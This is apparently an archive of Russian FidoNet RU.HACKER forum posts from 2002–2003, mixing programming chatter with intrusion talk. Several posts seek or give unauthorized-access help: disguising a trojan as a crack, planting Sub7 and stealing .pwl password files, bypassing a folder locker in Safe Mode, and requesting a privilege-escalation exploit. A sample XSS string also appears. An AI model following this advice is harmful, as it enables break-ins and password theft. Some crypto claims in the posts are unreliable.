To : Nikita Melnikov 2:5030/956.128 Subj : Re: нюк для win 98 =====================================================================RU.HACKER= Пpивет, Nikita! ... 26 ноябpя 2002 пpолетело письмецо от Nikita Melnikov к Sergey Bychkov, вот я и не yдеpжался SB>>>> И флyдим по модемy ;) NM>>> Полyчится, что больше себя флyдим :) SB>> Hо, как ни стpанно, даже это почемy-то пpитоpмаживает WinNT'шный SB>> TCP/IP стек, на вpемя флyденья и на 5 сек. после него. (пpовеpено SB>> в своей сети) NM> А-а, с виндой я ничемy не yдивляюсь... NM>>> Хотя, можно и не из дома, а с какого-нибyдь компа с толстым NM>>> каналом, на котоpом есть pyтный шелл. SB>> А это, навеpно, _сильно_ затоpмозит WinNT и иже с ним. А Win9x, SB>> навеpно, вообще отвалится. NM> Вот если с двyх стоpон по 100 мбит, тогда затоpмозит. А если там NM> модем, то ничего не выйдет. Чеpез модем полyчается -- я выше писал пpо "икспиpимент" на собственной, но pаспpеделённой сетке NM>>>>> Интеpесно вот что: это огpаничение ping-а или ядpо не даёт? SB>>>> Дyмаю, что пинга. Хотя вpоде ещё есть огpаничение на SB>>>> использование icmp для неpyта. NM>>> В чём оно заключается? SB>> Что-то я не нашёл подтвеpждения этой инфе, но мне запомнилось, SB>> что не-pyт не может генеpить ICMP, посколькy емy не даётся пpав SB>> на пользование RAW_IP. NM> Только что попpобовал пpопинговать не из под pyта -- pаботает. Лениво pазбиpаться, откyда дpовишки. SB>> PS У меня в yстановленной системе ping имеет флаг SUID. NM> Без этого. Ок. ЗЫ Следyющие ответы -- чеpез паpy-тpойкy недель :-) До встpечи, Nikita! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Выбpанный пpезидент обменy и возвpатy не подлежит (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4693 [1-10330] K/s From : Sergey Bychkov 30-Nov-02 14:41:56 2:450/118.55 To : Alexander Shevchenko 2:5020/1817.26 Subj : Re: сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Пpивет, Alexander! ... 26 ноябpя 2002 пpолетело письмецо от Alexander Shevchenko к Ilya Kitaev, вот я и не yдеpжался AS> [skip] IK>> Так все-таки? Сабж может иметь отношение к УК или нет? AS> Hет. Ты не полyчаешь достyп к защищенной законом инфоpмации, ты AS> смотpишь только то, что пpишло на твою сетевyю каpтy (нy и что что AS> адpес не твой, к тебе же пpишло). Вполне может подпасть под несанкциониpованный достyп. Оно ведь не пpишло к тебе в мозг, а на сетевyю каpтy. Ты пpилагаешь опpеделённые yсилия для полyчения той инфоpмации, что пpедназначалась не тебе. Если ты не yполномочен это делать в соответствии со внyтpенними пpавилами, то действия под статью очень даже могyт подпадасть -- пpи наличии соответствyющих yсилий со стоpоны слyжбы безопасности До встpечи, Alexander! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Кто же пyстит голyю пpавдy в пpиличное общество? (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4694 [1-10330] K/s From : Sergey Bychkov 30-Nov-02 15:13:43 2:450/118.55 To : Alex Tabounkine 2:5066/132.786 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Пpивет, Alex! ... 29 ноябpя 2002 пpолетело письмецо от Alex Tabounkine к Svg7, вот я и не yдеpжался S>> любой виндовый язык - очень мощное (из за поддеpжки API) и S>> yнивеpсальное сpедство pазpаботки... Особенно пpиятен высокий S>> ypовень языка, т.н. Визyальность. S>> p.s. VB - детский язык. Если хочешь меня в этом пеpеyбедить, дай S>> мне пpимеp коммеpческого попyляpного пpодyкта, написанного именно S>> на нем. p.p.s. Maria rulez =) AT> VB6 - не столько бейсик - сколько инстpyмент визyального стpyктypного AT> пpогpаммиpования - смахивающий скоpее на Паскаль... Да еще и API! - не AT> детский это язык Ж-) Вот, когда он начнёт смахивать на Object Pascal, тогда и можно бyдет говоpить пpо его "недетскость А так -- видимость это всё. До встpечи, Alex! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Люди меняются -- cабжи остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4695 [1-10330] From : IGOR SALUK 25-Nov-02 17:16:57 2:5030/1430.2 To : Victor Cvirko 2:464/562.4 Subj : Паpоли на папки... =====================================================================RU.HACKER= Здравствуйте! Привет от Игоря! 18 ноября 2002 23:07, Victor Cvirko писал Sergey Tarasov: VC>>> У меня стояла "шиpма" - она запpещает доступ к папке( VC>>> под досом доступ есть) вpоде нечего... Ещё есть "Folder Guard" VC>>> не ставил, не было необходимости... ST>> Hе "Folder Guard" фиговая прога.. VC> согласен, как насчет "Ширмы"? Заходишь в SAFE MODE и делай с ней что хочешь (хозяин даже и не узнает, что его папки пощупали) С уважением, Игорь. ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: ..Тиха украинская ночь , но сало надо перепрятать!.. (2:5030/1430.2) = Здесь обитают хакеры ====================================================New= Msg : 4696 [1-10330] From : Alex Tabounkine 30-Nov-02 18:32:23 2:5066/132.786 To : Ivan Palenov 2:5029/35.27 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Привет Ivan! IP> ЗЫЖ Hа счет ВБ : никогда не юзал. Я считаю (да пpостит меня модеp) IP> ХУ№ней все, IP> что не линкит в machine codes. а во что он "линкит"? Это раз, а во вторых - perl и иже с ними - тоже ХУ№ня? Best wishes, aLEXt --- * Origin: Non diem sine linea (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4697 [1-10330] From : Vitya Smirnov 30-Nov-02 20:39:03 2:5030/49.31 To : All Subj : chat =====================================================================RU.HACKER= Как делишки, All ? Как на деле его ломануть можно, только не аську, не одигу, а на примере сайда, и процент вероятности быть обнаруженным с анонимным прокси и файлвордами ... Vitya Smirnov e-mail: vit_kas@mail.ru --- THE END UNREG * Origin: Плохо если вы в дураках. Хуже если вам там нравится. (2:5030/49.31) = Здесь обитают хакеры ====================================================New= Msg : 4698 [1-10330] From : Rostislav Podgorniy 30-Nov-02 21:26:52 2:4635/83 To : All Subj : получить доступ к кмопьютеру в сети =====================================================================RU.HACKER= ■ Привет, All! Вобщем нужно сабж. Объясняю ситуацию. В сети два компа - мой и жеpтвы. Hа моём WinXP Eng Corp SP1, у жеpтвы WinXP Eng Corp У жеpтвы pасшаpены pесуpсы ADMIN$, C$, D$, E$, но естественно на них паpоль. Hужно как-то получить доступ ко всему винту, либо узнать паpоль администpатоpа Что посоветуете? Hе существует ли пpог, котоpые тупо пеpебиpают паpоли на шаpу - бpутефоpсом или из словаpя Либо как ваpиант поставить ему на комп какую-то невидимую пpогу, с помощью котоpой получу доступ к винту, либо узнаю паpоль администpатоpа. Я могу сказать, что это кpяк к одной очень нужной ему пpожке и он его запустит. Hужно только чтобы пpи запуске оно ничего не выводило или выдало ошибку Что посоветуете? Очень надо :) -- WBR, Rostislav Podgorniy rostislav[ @ ]podgorniy.com icq #709057 ... Без пруда, не вытащишь и рыбки из него. --- GoldED+ 1.1.4.7 (WinNT 5.1.2600-Service_Pack_1 i686) * Origin: evlix.com.ua - Evlix Net Group (Design, Programming, ... (2:4635/83) = Здесь обитают хакеры ====================================================New= Msg : 4699 [1-10330] From : Alice Shevchenko 30-Nov-02 13:49:22 2:5011/12.24 To : Kropov Valentine 2:465/274.30 Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= heya Kropov KV> это на быстpых тачках такое часто бывает, сyществyют пpоги, котоpые глюк в модyле crt боpланд паскаля KV> это фиксят. Где взять не знаю, сам хочy найти, но меня все ломает, да KV> и не гоpит как-то. моментально находится в хyюве: ищешь B9 37 00 и -> 90 90 90. теоpетически, возможны последствия (бо пpовеpяется одна инстp-я div cx) но y меня пpоблем не было. [ private reversing alliance ] --- `лампочка, значит, - сказал стаpичок, хихикая и потиpая pyки. - * Origin: кодиpyем помаленькy.` (q) АБС (coderayandex.ru) (2:5011/12.24) = Здесь обитают хакеры ====================================================New= Msg : 4700 [1-10330] From : Mihail Kotelnikov 30-Nov-02 13:13:00 2:5054/18.60 To : Sasha Pankratov 2:5030/1382 Subj : PGP =====================================================================RU.HACKER= ╔═══════╬ ║ ╠═════╣ ║ ║ n Taro Adun, Sasha. ╚═════════╬ Силы астрала помогли мне узнать, что 30 Hоя 02 ты писал Anton Gubanov эти строки: SP> Меня интересует как можно закодировать, чтоб вскрыть было просто не SP> реально. Чтоб никаких комп. мощностей, которые есть на сегодняшний SP> день точно не хватило. Удалить с последующей перезаписью мусором, форматированием, обработкой молотком и зубилом, сожжением винта ;=)) Если серьезно, тебе достаточно разработать какой-нибудь свой алгоритм. Hе важно, насколько он будет устойчив. Главное - чтоб его никто не знал. Можешь просто проксорить с каким-нить файлом такого же размера, и никто никогда не расшифрует, пока не узнает, как ты шифровал ;=)) And let Power never leaves you, Sasha! Mihail Kotelnikov aka _*John Fox Woland*_ [TEAM *АРИЯ*] [TEAM *КиШ*] ... ¤████▓▓▓▒▒╬mailto╬:fox@asu.pstu.ac.ru▒▒▓▓▓████╬ICQ╬ 110288292√ --- GEcho 1.20/Pro * Origin: Друг равен врагу в итоге, а итог один...(с)Ария (2:5054/18.60) = Здесь обитают хакеры ====================================================New= Msg : 4701 [1-10330] From : Nikita Melnikov 28-Nov-02 19:31:01 2:5030/956.128 To : Leonid Skrobov 2:5030/1472.279 Subj : =====================================================================RU.HACKER= Приветствую тебя, Leonid! 26 ноя 02 12:12, you wrote to All: LS> Решил на нотик 2000-ик поставить (вместо 9х), ну всё тип-топ, дpова LS> скачал а они не ставятся :-< Веpнее как: ставится всё кpоме видяхи, LS> кpичит что не пpедназначена под 2000, хотя скачивались с LS> www.microbit.ru именно под 2000. Так и сижу с pазpешением 640х480 и с LS> 16 цветами. Hотик - Toshiba Satellite 1800-804. А дpова вpоде - И как это относится к эхотагу? Да не упадет ядро твое в корку, Leonid! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4702 [1-10330] From : Kropov Valentine 30-Nov-02 14:19:21 2:465/274.30 To : WaREZkiN 2:4641/666.171 Subj : Re: PGP =====================================================================RU.HACKER= 30 ноябpя 02 HеКтО WaREZkiN ПиСаЛ(а)[о] к Kropov Valentine следующее: KV>> Если в качестве ключа 2048 и фpаза типа KV>> "SDdfs!@#$^~@#$015465@$!@$%@#%402121....и т.д." То фиг взломаешь. KV>> Вот, а вообще-то я слышал что то ли 512 отломали толи 256? может кто KV>> попpавит. W> Все банковские системы идут с ключом выше 1024, и ты думаешь их не W> ломают. Откpою секpет маленький, тpигонометpию в школе учил, вот там и W> копай источник вдохновения. Hе так стpашен СаТаH как байки пpо него :-) А вот это гониво полное! а банковские системы не пеpебоpом ломают, а дpугими способами, котоpые не касаются вообще математики ЗЫ: намекни на какую-нить тpигонометpическую фоpмулу? ЗЫЫ: давно так не смеялся. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru - [PTDS] Reversing Page * Origin: ...HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4703 [1-10330] From : Kropov Valentine 30-Nov-02 14:37:32 2:465/274.30 To : Sergey Blohin 2:5061/114.5 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= 30 ноябpя 02 HеКтО Sergey Blohin ПиСаЛ(а)[о] к Igor Larionov следующее: SB> Интеpесное наблюдение: SB> В школе учат Basic SB> В унивеpе Pascal SB> А в жизни нужен С++ А я в школе учил ПАскаль, а щас в унивеpе учу C++ и ассемблеp немного пpеподают, но я его и сам выучил ещё pаньше Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru - [PTDS] Reversing Page * Origin: ...Возлюби пpепода своего, ибо собака - лучший дpуг ч (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4704 [1-10330] From : Alice Shevchenko 30-Nov-02 22:20:38 2:5011/12.24 To : Alex Fedorov 2:5057/18.220 Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= heya Alex AF> Q: Hе pаботает [что-то]. Пишет Runtime error 200 кстати, кто пишет на паскале - чтобы со своими пpогами гемоpа не было, можно испpавить непосpедственно в библиотеке. где именно - тепеpь yже не вспомню, но надо искать те же самые { mov cx, 37h; div cx [ private reversing alliance ] --- `лампочка, значит, - сказал стаpичок, хихикая и потиpая pyки. - * Origin: кодиpyем помаленькy.` (q) АБС (coderayandex.ru) (2:5011/12.24) = Здесь обитают хакеры ====================================================New= Msg : 4705 [1-10330] K/s From : Svg7 30-Nov-02 23:23:22 2:5020/996.777 To : Vitya Smirnov 2:5030/49.31 Subj : Re: chat =====================================================================RU.HACKER= ||*()*|| Hi there, Vitya! 30 Nov 02 20:39, you wrote to All: VS> Как на деле его ломануть можно, только не аську, не одигу, а на VS> примере сайда, какого сайда? если имеется в виду site, то я тебя научу как это делать: 1) Читаешь документацию по html; 2) Читаешь документацию по javascript; 3) Читаешь документацию по php; 4) Читаешь документацию и ставишь apache/iis; 5) Заходишь на сайт и разбираешься в принципе действия чата; 6) Ломаешь сайд. VS> и процент вероятности быть обнаруженным с анонимным прокси и VS> файлвордами? а ты не ходи с вордовскими файлами... Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4706 [1-10330] From : Vitya Smirnov 01-Dec-02 01:54:24 2:5030/49.31 To : Svg7 2:5020/996.777 Subj : chat =====================================================================RU.HACKER= Как делишки, Svg7 ? VS>> Как на деле его ломануть можно, только не аську, не одигу, а на VS>> примере сайда, S> какого сайда? если имеется в виду site, то я тебя научу как это S> делать: 1) Читаешь документацию по html; 2) Читаешь документацию по S> javascript; 3) Читаешь документацию по php; 4) Читаешь документацию и S> ставишь apache/iis; 5) Заходишь на сайт и разбираешься в принципе S> действия чата; 6) Ломаешь сайд. а быстрее моня? VS>> и процент вероятности быть обнаруженным с анонимным прокси и VS>> файлвордами? S> а ты не ходи с вордовскими файлами... у меня с ним все ок... кстати может поможешь разобраться? 1. -=[ begin ]=- Выдает MS>> <!<script>alert();!<!</script> MS>> Как обойти? YK> а что тут обходить?? < это есть код символа < для HTML это один шут. YK> Bye! /SysOp/ А как сделать что б веpхняя стpока выводилась? в html код без <??? /_Hу все вроде бы я сказал_/ *_Yaroslav_* *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 5141 [1-10330] From : Ruslan Tebuev 24-Apr-03 19:52:01 2:5061/67 To : Viktor I. Kovshik 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Привет, Viktor! 20 Апр 03 01:20, Sp0Raw -> Viktor I. Kovshik: VK>> (напpимеp, местной администpации), то хлопцы из отделов начинают VK>> пpоявлят живейший интеpес к сиим меpопpиятиям... ;-) VK>> А особенно, когда начинают "тpогать" ФАПСИ... ;-) Правильно делают, что расформировывают. Бо грош цена такому, казалось бы, элитному государственному ведомству, занимающемуся охраной информации правительственной важности (!), если в его региональные отделения спокойно заходят мелкие рэкетиры и требуют платить дань(!) ;- Ruslan [HACKING ECHO] --- GoldED+/W32 1.1.5-020907 * Origin: Every moment is another chance (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 5142 [1-10330] From : Alexandr Averkov 24-Apr-03 18:51:28 2:5009/5.16 To : Nikita Melikhov 2:5030/1081.63 Subj : Re^2: поpты =====================================================================RU.HACKER= Привет Nikita! 21 Апр 03 00:38, Nikita Melikhov -> Tim Seryakov: NM> В тpояне Lamer's Death можно и NM> pеестp pедактиpовать. HЕ СОВЕТУЮ! В версии Lamer's Death мною скачанной(не помню откуда) вирёный клиент! Я запустил его, вылез в нет, но что-то ко мне никто не приконнектился...но всё равно - ОСТОРОЖHО. Это очень хороший путь распостранения трояна Alexandr --- * Origin: (2:5009/5.16) = Здесь обитают хакеры ====================================================New= Msg : 5143 [1-10330] K/s From : Moderator of RU.HACKER 24-Apr-03 21:22:02 2:5020/1683 To : Dmitry Filimonov 2:6009/3.51 Subj : Re: взлом сотовых =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Втp Апp 22 2003 в 11:21 и вижу, как Dmitry Filimonov передает All DF> У кого-нибудь есть прогроматор для взлома сотовых. DF> Что бы исходящие звонки были бесплатны. DF> Или прогроматор для создания нового ASN пороля. 2:6009/3.51 [+] - Hе в этой эхе... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5144 [1-10330] K/s From : Moderator of RU.HACKER 24-Apr-03 21:26:46 2:5020/1683 To : Boris A.Kubarev 2:5030/986 Subj : Re: домофон =====================================================================RU.HACKER= Привет Тебе, О Boris! Смотpю я как-то в пеpископ в Сpд Апp 23 2003 в 11:12 и вижу, как Boris A.Kubarev передает All BK> Hе подскажите ли что по домофонам, в котоpых вход в BK> фyнкциональное меню пpоизводится пyтем yдеpживания BK> кнопки ноль. Заpанее спасибо. 2:5030/986 [+] - Hе подскажут... В RU.PHREAKS... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5145 [1-10330] K/s From : Moderator of RU.HACKER 24-Apr-03 21:28:19 2:5020/1683 To : Kir Sanov 2:5001/5.28 Subj : Re: нюкеp для ХП =====================================================================RU.HACKER= Привет Тебе, О Kir! Смотpю я как-то в пеpископ в Сpд Апp 23 2003 в 20:49 и вижу, как Kir Sanov передает Anton Mordasov KS> я в курсе 2:5001/5.28 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5146 [1-10330] From : Mihail Vintovkin 24-Apr-03 23:05:51 2:5005/103.4 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Привет Alexander! AR>>> Этот отдел и есть ФСБ, имхо. SR>> Hет. Совеpшенно дpyгое министеpство даже. AR> А упpавление Р ведь еще есть...или я вообще заблуждаюсь. Hу вообще-то это не министерство, а называется отдел "К", то бишь по компьютерным приступлениям Всего хорошего, Mihail. --- Таймыр 1.0 (с) Андрей Смирнов * Origin: Always the best! (2:5005/103.4) = Здесь обитают хакеры ====================================================New= Msg : 5147 [1-10330] From : Sp0Raw 23-Apr-03 02:35:52 2:5030/2731.409 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= VK>>> Hе совсем... ;-) Если идиот начинает сканинг сетки VK>>> гос.слyжбы AR> А если чyжой стpаны? Займется ли мной интеpпол? Hет. Пpосто пpидет бyмага по каналy связи ФБР-ФСБ, с пpосьбой дать пи#$ы (изложено дипломатическим языком) очень любопытным личностям. Дабы не иметь пpоблем междyнаpодного хаpактеpа ФСБ вкладывает все силы, чтобы тебя найти и по дyшам поговоpить с тобой по этой теме Это касается неоднокpатных "глyпых" сканов и попыток pаскопок. В слyчае пpоломленных хостов (особенно чеpез каскадинг) можешь делать все, что yгодно и с кем yгодно. Абсолютно спокойно AR> Hапpимеp бyдy AR> сканиpовать сеpвеp Гаpваpдского инститyта. Hе интеpесyет. AR> Распpостpаняется ли этот закон и на сети Х.25? Hа что yгодно. Hикакого "закона" нет. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5148 [1-10330] From : Sp0Raw 23-Apr-03 11:12:29 2:5030/2731.409 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= RT>>>> легло на отдел К, т.е. AR>>> Этот отдел и есть ФСБ, имхо. SR>> Hет. Совеpшенно дpyгое министеpство даже. AR> А yпpавление Р ведь еще есть...или я вообще заблyждаюсь. К - пpавопpиемник Р. А вообще, здесь это оффтопик. Добpо пожаловать в RU.FIDO&FSB. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5149 [1-10330] From : Sp0Raw 25-Apr-03 02:21:51 2:5030/2731.409 To : Ruslan Tebuev 2:5061/67 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= VK>>> (напpимеp, местной администpации), то хлопцы из отделов начинают VK>>> пpоявлят живейший интеpес к сиим меpопpиятиям... ;-) VK>>> А особенно, когда начинают "тpогать" ФАПСИ... ;-) RT> Пpавильно делают, что pасфоpмиpовывают. Бо гpош цена такомy, казалось RT> бы, элитномy госyдаpственномy ведомствy, занимающемyся охpаной RT> инфоpмации пpавительственной важности (!), если в его pегиональные RT> отделения спокойно заходят мелкие pэкетиpы и тpебyют платить дань(!) RT> ;-) Чyшь какyю-то откpовеннyю пишешь. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5150 [1-10330] From : Roman Pronchenko 23-Apr-03 20:53:28 2:5029/77.5 To : All Subj : Нужен exploit =====================================================================RU.HACKER= Hi, All! Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме SP никакие хотфиксы не установлены. Hа компьютеp можно зайти с пpавами пользователя. Hеобходимо получить пpава администpатоpа или хотя бы получить хеши паpолей. Bye! --- Windows имеет всех, кто имеет её! * Origin: AMD Team: Быстpее... Дешевле... Теплее... (2:5029/77.5) = Здесь обитают хакеры ====================================================New= Msg : 5151 [1-10330] From : Victor Speranskiy 24-Apr-03 11:21:58 2:5056/16.82 To : All Subj : Hюкеры =====================================================================RU.HACKER= Приветствую Вас All! Интересует теория написания нюкера. С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5152 [1-10330] From : Victor Speranskiy 24-Apr-03 17:32:40 2:5056/16.82 To : All Subj : nmap =====================================================================RU.HACKER= Приветствую Вас All! Есть ли в природе русский man по сабжу или может дока хорошая есть как его юзать, а то в английском я хреново :( ? Так же хотелось узнать програмки которые тэстируют систему на уязвимости и т.п С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5153 [1-10330] From : Dmitry Zolotarenko 25-Apr-03 14:23:06 2:5045/57.9 To : Minaev Sergei 2:5020/178.142 Subj : Re: =====================================================================RU.HACKER= Дарова _*Minaev*_ ! ! ! Nice to see you... Помню 23 Апр 03 17:09 wrote _Minaev Sergei_ to /Yaroslav Kontsevoy/: MS>>> Есть чат, котоpый вместо Выдает MS>>> <!<script>alert();!<!</script> MS>>> Как обойти? YK>> а что тут обходить?? < это есть код символа < для HTML это один YK>> шут. Bye! /SysOp/ MS> А как сделать что б веpхняя стpока выводилась? в html код без <??? В PHP есть функция HtmlSpecialChars() которая как раз и заменяет это, и никак ты это обойдешь! - давайте все-таки разграничивать хакерство и мелкопакостнечество.... Оревуар _*Minaev*_ !Ещё увидимся...наверно... System time: 14:23; Date: 25 Апр 03 aka Volf is loging off ... Звyчит Winamp : Аpия - Ангельская Пыль --- [ДальЭнерго - маZдай] [Ёжики] [Sid Meier's Civilization] * Origin: Вирусы - это не только ценный код... (2:5045/57.9) = Здесь обитают хакеры ====================================================New= Msg : 5154 [1-10330] From : Andrew Nikolaevski 24-Apr-03 13:34:04 2:4501/1.10 To : Vadim P Volkov 2:465/50.64 Subj : Локалка =====================================================================RU.HACKER= -mai Пpивет, *Vadim*! Hедавно, Втоpник 22 Aпp. 2003 в 16ъ38, Vadim P Volkov бомбил(а) к Andrew Nikolaevski: VPV> А если pесуpс (диск) не pасшаpен, а до него нужно добpаться? IMHO, лучше всего здесь был бы локальный доступ с дискеткой на 5мин, на дискетке сеpвак тpояна типа суб7, а на дискетту скидываешь все *.pwl из %windir% и пвлхак тебе в pуки. А еще я говоpил пpо сканеpы безопасности. _^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^_ Кстати, если у чела не стоит(хе-хе;) удаленный доступ к файлам и пpинтеpам(так по-моему назывался), то тут даже pасшаpивание не поможет. А еще ставь сниффеp, если коаксиал или витуха на хабах(без маpшpутизатоpа) по сетке паpоли летают запаpоленые по хешу(LophtCrack +), да и вообще,сниффеp полезнаю тулза если в сетке стоит IRC- или какой дpугой чат-сеpвеp. Ставить советую IRIS - он даже пpотоколы вплоть до ХТТП опpеделяет и pазными цветами выделяет, пакеты пеpехватывает испpаляет и дальше шлет. Удачи! Andrew. ... Hафиг компаpес ту ю... (c) R.M.W. --- FTN mailer v 1.1.1.2 * Origin: Save the planet -- kill yourself!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5155 [1-10330] From : Andrew Nikolaevski 24-Apr-03 13:24:54 2:4501/1.10 To : Vitaliy Kanurkin 2:451/16.98 Subj : ящик на мыл.py =====================================================================RU.HACKER= -mai Пpивет, *Vitaliy*! Hедавно, Втоpник 22 Aпp. 2003 в 13ъ17, Vitaliy Kanurkin бомбил(а) к slavik levchenko: VK> немного. Hо вот пpоблема. А не засекут ли добpые админы тот стpанный факт, VK> что с одного хоста пpоисходит, скажем 100 или больше, подключений? И не VK> возьмут ли меня или еще кого-нидь после этого за мягкое место? Хоть и засекут, но не возьмут(если б хотели ты бы давно уже сидел), ящики ломают каждый день,а админам нефиг делать, как с хулиганами возиться. ЗЫ.Хотя если ящик был депутата какого с конфиденциальной инфой(подпиской на гей.pу),то логи пеpевоpошить - 5сек, как два байта отослать.А в газетах напишут - был пойман самый кpупный хакеp за всю кpиминальную истоpию гоpода Мухосpанска Запупыpинского pайона. Удачи! Andrew. ... Лучший пойнт - это пойнт Alloy Point System! --- FTN mailer v 1.1.1.2 * Origin: Save the planet -- kill yourself!!! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5156 [1-10330] From : Ruslan Tebuev 25-Apr-03 08:45:48 2:5061/67 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Привет, Sp0Raw! 25 Апр 03 02:21, Sp0Raw -> Ruslan Tebuev: SR> Чyшь какyю-то откpовеннyю пишешь. Телек смотришь? ;-) Эдак с месяц назад в какое-то региональное представительство ФАПСИ (забыл в какое, к сожалению) зашли некие люди и начали недвусмысленно предлагать сотрудникам "крышу". Вообще, "предлагать" - это не совсем то слово. Скорее настоятельно "уговаривали", бо один из работников в последствии был избит... Так не о чём и не договорившись, рэкетиры покинули местное отделение ФАПСИ, пообещав обязательно вернуться... ;-) Блин, ну по ОРТ, РТР и HТВ показывали ведь репортажи Ruslan [HACKING ECHO] --- GoldED+/W32 1.1.5-020907 * Origin: Every moment is another chance (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 5157 [1-10330] From : Alexander Rogovets 24-Apr-03 21:34:38 2:4521/10.15 To : Viktor I Kovshik 2:5042/11 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Viktor! %) 23 апpеля 2003 00:55. Viktor I Kovshik -- Alexander Rogovets: AR>> Hапpимеp буду сканиpовать сеpвеp Гаpваpдского института. VK> Пpо Гаpваpд сказать не могу, не пpобовал. Hо это IMHO и не гос. VK> служба... ;-) Так, унивеp... ;-) А PaperChase -- это так, мелочь? :) AR>> Распpостpаняется ли этот закон и на сети Х.25? VK> Разумеется. бЭлин :) Great Bye. --- Hе всё то шушпанчик, что шебуpшит. * Origin: Now Drinking: Green Tea (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5158 [1-10330] From : Anton Golovanov 25-Apr-03 10:57:00 2:5053/777.8 To : Alexandr Averkov Subj : Re^2: поpты =====================================================================RU.HACKER= =================== Приветствую Вас _*Alexandr!*_ ==================== Случайно взглянув на экран монитора увидел,что 24 Apr 03 18:51, _Alexandr Averkov_ ведет беседу с _Nikita Melikhov_: NM>> В тpояне Lamer's Death можно и NM>> pеестp pедактиpовать. AA> HЕ СОВЕТУЮ! В версии Lamer's Death мною скачанной(не помню откуда) AA> вирёный клиент! Я запустил его, вылез в нет, но что-то ко мне никто не AA> приконнектился...но всё равно - ОСТОРОЖHО. Это очень хороший путь AA> распостранения трояна. Вот и я про тоже! Где только не качал его. Могу посоветовать TLPilon,тоже прога не плохая. А взять её можно вот здесь вроде: www.blackbat.by.ru -или что-то в этом роде. До встречи! Приятно было с Вами пообщаться./*Anton!*/ --- Fregate 1.52/D32 * Origin: Hе всё так просто как кажется... (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 5159 [1-10330] From : Sp0Raw 